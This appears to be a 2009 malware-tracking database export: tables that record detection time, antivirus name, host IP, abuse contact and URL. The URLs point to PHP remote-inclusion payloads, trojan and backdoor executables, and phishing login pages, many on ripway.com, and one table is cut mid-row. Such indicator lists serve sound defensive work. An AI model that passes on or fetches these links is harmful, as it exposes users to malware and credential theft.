| 2009-07-19 15:17:43 | undef | unknown_html_RFI_php | 206.221.191.3 | domain@corporatesummaries.com | US | ARIN | CORPORATESUMMARIES | http://coinheaven.com/blog/images/hard/fx2id.txt |
| 2009-07-19 15:07:55 | undef | unknown_html_RFI_php | 98.137.46.72 | network-abuse@cc.yahoo-inc.com | US | ARIN | A-YAHOO-US9 | http://www.geocities.com/kelvin_aja/ping.txt |
| 2009-07-19 14:39:14 | undef | unknown_html_RFI_php | 64.185.237.80 | Domains@cbcast.net | US | ARIN | CBCAST | http://www.pupapa.com/zero/tmp/sp.v |
| 2009-07-19 12:48:51 | avira | BDS/PHP.Agent.BH | 79.174.72.79 | abuse@hc.ru | RU | RIPE | HOSTING-COMPANY-NET | http://www.cityfit.ru/stat/dtc.txt |
| 2009-07-19 12:27:24 | avira | PHP/Pbot.A | 200.87.164.22 | ip@ENTELNET.BO | BO | LACNIC | BO-ESEN-LACNIC | http://www.sanagustin.edu.bo/modules/aprinter.xpp |
| 2009-07-19 12:00:45 | avira | PHP/BackDoor.AR | 68.178.211.6 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://www.firearts.org/events//ws/_b |
| 2009-07-19 11:58:27 | undef | unknown_html_RFI_php | 68.178.211.6 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://www.firearts.org/events//ws/_a |
| 2009-07-19 11:41:41 | avira | PHP/Spam.5833 | 98.137.46.72 | network-abuse@cc.yahoo-inc.com | US | ARIN | A-YAHOO-US9 | http://www.geocities.com/urgly@ymail.com/money.txt |
| 2009-07-19 11:31:32 | avira | BDS/PHP.ali.9 | 69.89.31.237 | abuse@bluehost.com | US | ARIN | BLUEHOST-NETWORK-1 | http://www.todsaporn.com/test/cfg |
| 2009-07-19 10:19:13 | undef | unknown_html_RFI_php | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICANE-4 | http://bangsat5.fileave.com/id.txt |
| 2009-07-19 09:20:00 | avira | SPR/PHP.ID | 61.59.200.127 | ccyang@du.net.tw | TW | APNIC | SEEDNET-TW | http://61.59.200.127/appserv/z.txt |
| 2009-07-19 08:59:23 | avira | PHP/BackDoor.AR | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICAN
-
and all malware @ripway.com
+----------------------+---------+---------------------------+--------------+--------------+---------+--------+-------------+-------------------------------------------------------------------------------------+
| from_unixtime(first) | scanner | virusname | review | email | country | source | netname | url |
+----------------------+---------+---------------------------+--------------+--------------+---------+--------+-------------+-------------------------------------------------------------------------------------+
| 2009-07-21 13:25:19 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/zh4ck3rz/out.exe |
| 2009-07-21 13:25:18 | avira | TR/Drop.Stabs.aap | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/yjm/sex.exe |
| 2009-07-21 13:25:18 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/YouareaLoser/ |
| 2009-07-21 13:25:18 | avira | BDS/Bifrose.aleo | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/yourtube/3.exe |
| 2009-07-21 13:25:18 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/yourtube/up7.exe |
| 2009-07-21 13:25:18 | avira | BDS/Bifrose.aleo | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/yourtube/windows.exe |
| 2009-07-21 13:25:18 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/yrr/sysem.exe |
| 2009-07-21 13:25:18 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/yusron16/fs.html |
| 2009-07-21 13:25:18 | avira | WORM/IrcBot.jvw | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/zabado2010/3.exe |
| 2009-07-21 13:25:18 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/zahirka/index.php?link=http://&size |
| 2009-07-21 13:25:18 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/zahirka/index.php?link=http://&size= |
| 2009-07-21 13:25:18 | avira | DR/Turkojan.evn | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/zenaeshta/lamees.com |
| 2009-07-21 13:25:18 | avira | TR/AntiAV.SU | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/zero0007/alsafah.exe |
| 2009-07-21 13:25:18 | avira | BDS/Bifrose.aqib | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/zero0007/non.exe |
| 2009-07-21 13:25:18 | avira | TR/Dldr.VB.JTZ | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/zero0007/ser.exe |
| 2009-07-21 13:25:17 | avira | TR/Poison.ymq | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/xdanker/xserver.exe |
| 2009-07-21 13:25:17 | avira | TR/Spy.335908 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/xtorrentsx/Drew.exe |
| 2009-07-21 13:25:17 | avira | DR/DNSChanger.nvj | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/y/startimes.exe |
| 2009-07-21 13:25:16 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/welaa/s.exe |
| 2009-07-21 13:25:16 | avira | TR/Agent.buag.70 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/windazo/piczo.exe |
| 2009-07-21 13:25:16 | avira | TR/Midgare.NFV.1 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/winmaton/rock.exe |
| 2009-07-21 13:25:16 | avira | TR/Poison.yeg | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/winmaton/setup-.exe |
| 2009-07-21 13:25:16 | avira | WORM/IrcBot.jvw | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/winmaton/setup.exe |
| 2009-07-21 13:25:16 | avira | TR/Midgare.NFV.1 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/winmaton/setupe.exe |
| 2009-07-21 13:25:16 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/wonderboy3453/login.php |
| 2009-07-21 13:25:16 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/worldofwarcrafteula |
| 2009-07-21 13:25:16 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/worldofwarcrafteula/ |
| 2009-07-21 13:25:16 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/worldofwarcrafteula/auth/identity_verification.html |
| 2009-07-21 13:25:16 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/WoWotLK |
| 2009-07-21 13:25:16 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/WrathoftheLK |
| 2009-07-21 13:25:16 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/WrathoftheLK/ |
| 2009-07-21 13:25:16 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/x0v/1.exe |
| 2009-07-21 13:25:16 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/xabiib12/pics.exe |
| 2009-07-21 13:25:16 | avira | TR/Spy.68608.8 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/xaxax123/c.exe |
| 2009-07-21 13:25:15 | avira | TR/Midgare.xob | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/ufc/crypted%20kaboss.exe |
| 2009-07-21 13:25:15 | avira | BDS/Poison.agqf | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/UFC/youe.exe |
| 2009-07-21 13:25:15 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/vbforum/msn.exe |
| 2009-07-21 13:25:15 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/venusvhi/iseng/login.php |
| 2009-07-21 13:25:15 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/verificationmail/paypal.htm |
| 2009-07-21 13:25:15 | avira | WORM/SdBot.DWZ | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/video13/telecharger_activx.exe |
| 2009-07-21 13:25:15 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/vjayskate/login.html |
| 2009-07-21 13:25:14 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/tim18/files.php |
| 2009-07-21 13:25:14 | avira | W32/Parite | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/toxick/johnn.exe |
| 2009-07-21 13:25:14 | avira | BDS/Hamweq | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/toxick/tox.exe |
| 2009-07-21 13:25:14 | avira | BDS/Hupigon.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/tr0jan/server.exe |
| 2009-07-21 13:25:14 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/tramatiized/metus_setup.exe |
| 2009-07-21 13:25:13 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/susanneluv/index.html |
| 2009-07-21 13:25:13 | avira | TR/Agent.11216 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/swat/ser.exe |
| 2009-07-21 13:25:13 | avira | WORM/IrcBot.jvw | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/t11/imagshow.exe |
| 2009-07-21 13:25:13 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/tarki2008/login.php |
| 2009-07-21 13:25:12 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/silverservant/log1n.html |
| 2009-07-21 13:25:12 | avira | W32/Mabezat | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/skype911/nane.exe |
| 2009-07-21 13:25:12 | avira | TR/Drop.Stabs.aap | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/soso263/sbb.wmv |
| 2009-07-21 13:25:12 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/soxu/new.exe |
| 2009-07-21 13:25:12 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/steve777/friendster/login.html |
| 2009-07-21 13:25:11 | avira | BDS/Bifrose.akbc | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/sara/videu.exe |
| 2009-07-21 13:25:11 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/saudifox/sarver.exe |
| 2009-07-21 13:25:11 | avira | BDS/Hupigon.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/seagirt007/seagirt.exe |
| 2009-07-21 13:25:11 | undef | unknown_exe | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/shaded1212/shaded.exe |
| 2009-07-21 13:25:11 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/shakagp/login.php |
| 2009-07-21 13:25:11 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/shellh4ck/s.h.exe |
| 2009-07-21 13:25:11 | avira | WORM/IrcBot.jvw | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/shellh4ck/shellhack.exe |
| 2009-07-21 13:25:11 | avira | TR/Crypt.XPACK.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/shvi/free.exe |
| 2009-07-21 13:25:09 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rs26/index.php?link=http://&size= |
| 2009-07-21 13:25:09 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rs54/index.php |
| 2009-07-21 13:25:09 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/ruileee/ruileeehack/fakelogin.php |
| 2009-07-21 13:25:08 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rootsystem/login/login.php |
| 2009-07-21 13:25:08 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rs26/index.php?link=http://&size |
| 2009-07-21 13:25:08 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/roixahinhbong/inst_speeder.exe |
| 2009-07-21 13:25:07 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rapidchare/login.php? |
| 2009-07-21 13:25:07 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rapiddshar |
| 2009-07-21 13:25:07 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rapiddshar/ |
| 2009-07-21 13:25:07 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rapiidshare |
| 2009-07-21 13:25:06 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/premansini/friendsterz/friendster.html |
| 2009-07-21 13:25:06 | avira | TR/Crypt.XPACK.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/pri55ce/wep-top/wep.exe |
| 2009-07-21 13:25:06 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/q1qfr/a.exe |
| 2009-07-21 13:25:06 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/q28y/calculator33.exe |
| 2009-07-21 13:25:06 | avira | TR/Crypt.XPACK.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/q28y/lol%20has%20been%20fucked.exe |
| 2009-07-21 13:25:06 | avira | TR/Drop.Stabs.aap | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/q8888p/obadah.scr |
| 2009-07-21 13:25:06 | avira | TR/Crypt.XDR.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/qwe020/bound.exe |
| 2009-07-21 13:25:06 | avira | BDS/Poisonivy.E.3 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rabmunna/josh.com |
| 2009-07-21 13:25:06 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rapidchare/login.php |
| 2009-07-21 13:25:05 | avira | TR/Spy.Agent.AHAB | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/al%20jazeera%20sport%20player%202.0.exe |
| 2009-07-21 13:25:05 | avira | DR/Delphi.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/art%20sport.exe |
| 2009-07-21 13:25:05 | avira | TR/VB.kmt.37 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/kooora%20canal%201.1.exe |
| 2009-07-21 13:25:05 | avira | TR/Spy.Agent.AHAB | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/star%20monitor%201.0.exe |
| 2009-07-21 13:25:05 | avira | BDS/Bifrose.akbc | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/toolbar-kooora.exe |
| 2009-07-21 13:25:05 | avira | TR/VB.kmt.7 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/tv%20player%201.2%20champions%20league.exe |
| 2009-07-21 13:25:05 | avira | TR/VB.kmt.9 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/uefa%20champions%20league%20player.exe |
| 2009-07-21 13:25:05 | avira | TR/VB.kmt.37 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/wydad%20xp%201.0.exe |
| 2009-07-21 13:25:05 | avira | TR/TDss.agfj | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/panoky/conreport.pdf |
| 2009-07-21 13:25:05 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paypai/www.paypal.com |
| 2009-07-21 13:25:05 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/PayPaILogin |
| 2009-07-21 13:25:05 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/payplal/index.html |
| 2009-07-21 13:25:05 | avira | DR/bvb.SAG | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/pic1/server.exe |
| 2009-07-21 13:25:04 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/omfgloldoom/rentnzm.exe |
| 2009-07-21 13:25:04 | avira | TR/ATRAPS.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/omfgloldoom/Tdialer.exe |
| 2009-07-21 13:25:03 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/newly14/Ancient%20Katana/login.html |
| 2009-07-21 13:25:03 | avira | BDS/Bifrose.begy | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/nic/suzan.jpg.exe |
| 2009-07-21 13:25:03 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/Oldfs02/index.html |
| 2009-07-21 13:25:02 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/nethom/tom%20clancys%20hawx%202009eng.exe |
| 2009-07-21 13:25:02 | avira | BDS/Bifrose.bbna.5 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/new1111/keymaker.exe |
| 2009-07-21 13:25:02 | avira | TR/Drop.Stabs.aap | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/newhajar/hajarita.exe |
| 2009-07-21 13:25:00 | avira | SPR/Tool.CeeInject.36797J | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mtall9/hii11.exe |
| 2009-07-21 13:25:00 | avira | BDS/Bifrose.akbc | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mtall9/www.exe |
| 2009-07-21 13:25:00 | avira | DR/Bifrose.bazv.4 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/nada12/face%20on%20body.exe |
| 2009-07-21 13:24:59 | avira | WORM/SdBot.DGAZ | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/movoo79606/11032009003.mp4.exe |
| 2009-07-21 13:24:59 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/movoo79606/20060428044.mp4.exe |
| 2009-07-21 13:24:59 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/movoo79606/20060428066.mp4.exe |
| 2009-07-21 13:24:59 | avira | TR/Agent.ckeq | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/movoo79606/mov010220.mpg.exe |
| 2009-07-21 13:24:59 | avira | DR/Delphi.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mrcloner/svchost.exe |
| 2009-07-21 13:24:59 | avira | DR/Agent.hua | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/ms3leko/image982-gif.exe |
| 2009-07-21 13:24:59 | avira | WORM/IrcBot.jvw | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mshm/imghp.exe |
| 2009-07-21 13:24:58 | avira | TR/Agent.colt | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mov0009809/mov000117.mp4.exe |
| 2009-07-21 13:24:57 | avira | BDS/Bifrose.ZXE | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/majro7053/l7l.exe |
| 2009-07-21 13:24:57 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/malamhitam/fs.html |
| 2009-07-21 13:24:57 | avira | TR/Drop.Stabs.aap | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mambabh/server.exe |
| 2009-07-21 13:24:57 | avira | BDS/Poison.zzg | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mataz/noor.exe |
| 2009-07-21 13:24:57 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mazouzi/server.exe |
| 2009-07-21 13:24:57 | avira | DR/Delphi.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mbc111/aza.exe |
| 2009-07-21 13:24:57 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/metalrouge0/allchanneltv.exe |
| 2009-07-21 13:24:57 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mlk055/lol.exe |
| 2009-07-21 13:24:57 | avira | BDS/Poison.ahap | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mmffmmff/ssaass.exe |
| 2009-07-21 13:24:57 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mobileslive/acceslivemobileconection.htm |
| 2009-07-21 13:24:57 | avira | TR/ATRAPS.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/MOD4SALE/AK47.exe |
| 2009-07-21 13:24:57 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/MOD4SALE/imbotpacked.exe |
| 2009-07-21 13:24:57 | avira | TR/ATRAPS.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mod4sale/lol/server.exe |
| 2009-07-21 13:24:57 | avira | TR/ATRAPS.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mod4sale/metusdelphi2.8/2.8finalmetus.exe |
| 2009-07-21 13:24:57 | avira | WORM/IrcBot.jvw | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mona51/coffin.exe |
| 2009-07-21 13:24:56 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/liamh/test.php |
| 2009-07-21 13:24:56 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/live4free/login.html |
| 2009-07-21 13:24:56 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/loginhotmail/update.exe |
| 2009-07-21 13:24:56 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/lovemovie/sexhotcam.exe |
| 2009-07-21 13:24:56 | avira | TR/Drop.Stabs.aap | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/lovemovie/videosex.exe |
| 2009-07-21 13:24:56 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/majeeeed/8099.exe |
| 2009-07-21 13:24:55 | avira | TR/Spy.Banker.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/killerzim/Foto.jpg.exe |
| 2009-07-21 13:24:55 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/killerzim/wuauclt.exe |
| 2009-07-21 13:24:55 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/KINGZW/index.php |
| 2009-07-21 13:24:55 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/kiprock/suck/login.php |
| 2009-07-21 13:24:55 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/kiprock/suck/login.php? |
| 2009-07-21 13:24:55 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/kl1ku/index.php |
| 2009-07-21 13:24:55 | avira | TR/Agent.uckr | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/kl3zero/imuhgetyou.exe |
| 2009-07-21 13:24:55 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/krazyman/login.php |
| 2009-07-21 13:24:55 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/LaTinBoy/gunbound |
| 2009-07-21 13:24:54 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/khaled1234/TASKMAN_DT.exe |
| 2009-07-21 13:24:53 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/keane/login.php |
| 2009-07-21 13:24:52 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/justblaze05/sever.exe |
| 2009-07-21 13:24:52 | avira | DR/bvb.SAG | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/kaled2000/server.exe |
| 2009-07-21 13:24:50 | avira | WORM/IrcBot.jvw | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/hinda/hotsexy.exe |
| 2009-07-21 13:24:50 | avira | TR/Crypt.ZPACK.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/hkayne10/trance%20music.exe |
| 2009-07-21 13:24:50 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/hzman/lolo.exe.lolo |
| 2009-07-21 13:24:50 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/iinsert/index.php?link=http://&size |
